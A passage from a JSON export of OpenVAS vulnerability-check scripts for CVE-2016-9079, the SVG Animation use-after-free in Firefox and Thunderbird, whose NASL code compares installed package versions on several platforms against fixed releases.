script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox-ESR/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"45.5.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"45.5.1\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-02T00:00:00", "type": "openvas", "title": "RedHat Update for firefox RHSA-2016:2843-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871725", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871725", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for firefox RHSA-2016:2843-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871725\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 05:33:09 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for firefox RHSA-2016:2843-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web\nbrowser.\n\nThis update upgrades Firefox to version 45.5.1 ESR.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"firefox on\n Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2843-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-December/msg00001.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.5.1~1.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.5.1~1.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.5.1~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.5.1~1.el6_8\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.5.1~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-debuginfo\", rpm:\"firefox-debuginfo~45.5.1~1.el5_11\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:35:24", "description": "Check the version of thunderbird", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2016:2850 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882607", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2016:2850 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882607\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:00:46 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2016:2850 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail\nand newsgroup client.\n\nThis update upgrades Thunderbird to version 45.5.1.\n\nSecurity Fix(es):\n\n * A flaw was found in the processing of malformed web content. A web page\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2016-9079)\n\nRed Hat would like to thank the Mozilla project for reporting this issue.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2850\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-December/022169.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~45.5.1~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-19T22:12:06", "description": "This host is installed with\n Mozilla Firefox Esr and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809827\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 12:34:34 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Firefox Esr Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox Esr and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox Esr version before\n 45.5.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox Esr version 45.5.1\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"45.5.1\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"45.5.1\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-06-25T14:49:35", "description": "This host is installed with Mozilla\n Thunderbird and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-06-25T00:00:00", "id": "OPENVAS:1361412562310809829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:thunderbird\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809829\");\n script_version(\"2019-06-25T08:25:15+0000\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-06-25 08:25:15 +0000 (Tue, 25 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 13:43:02 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Thunderbird Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Thunderbird and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Thunderbird version before\n 45.5.1 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Thunderbird version 45.5.1\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Thunderbird/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/thunderbird\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!tbVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:tbVer, test_version:\"45.5.1\"))\n{\n report = report_fixed_ver(installed_version:tbVer, fixed_version:\"45.5.1\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-19T22:12:35", "description": "This host is installed with\n Mozilla Firefox and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809830\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 13:56:35 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before\n 50.0.2 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 50.0.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"50.0.2\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"50.0.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-19T22:11:37", "description": "This host is installed with\n Mozilla Firefox and is prone to denial of service vulnerability.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310809825", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809825", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809825\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-9079\");\n script_bugtraq_id(94591);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 12:07:25 +0530 (Thu, 01 Dec 2016)\");\n script_name(\"Mozilla Firefox Security Updates( mfsa_2016-92_2016-92 )-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Mozilla Firefox and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Flaw exists due to,\n Use-after-free in SVG Animation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to cause a denial of service via application crash,\n or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before\n 50.0.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 50.0.2\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2016-92\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"50.0.2\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"50.0.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:54:35", "description": "A use-after-free vulnerability in the\nSVG Animation was discovered in the Mozilla Firefox web browser, allowing a\nremote attacker to cause a denial of service (application crash) or execute\narbitrary code, if a user is tricked into opening a specially crafted website.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3728-1 (firefox-esr - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703728", "href": "http://plugins.openvas.org/nasl.php?oid=703728", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3728.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3728-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703728);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-9079\");\n script_name(\"Debian Security Advisory DSA 3728-1 (firefox-esr - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-01 00:00:00 +0100 (Thu, 01 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3728.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"firefox-esr on Debian Linux\");\n script_tag(name: \"insight\", value: \"Firefox ESR is a powerful, extensible\nweb browser with support for modern web application technologies.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 45.5.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n script_tag(name: \"summary\", value: \"A use-after-free vulnerability in the\nSVG Animation was discovered in the Mozilla Firefox web browser, allowing a\nremote attacker to cause a denial of service (application crash) or execute\narbitrary code, if a user is tricked into opening a specially crafted website.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-dbg\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-dev\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-as\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", 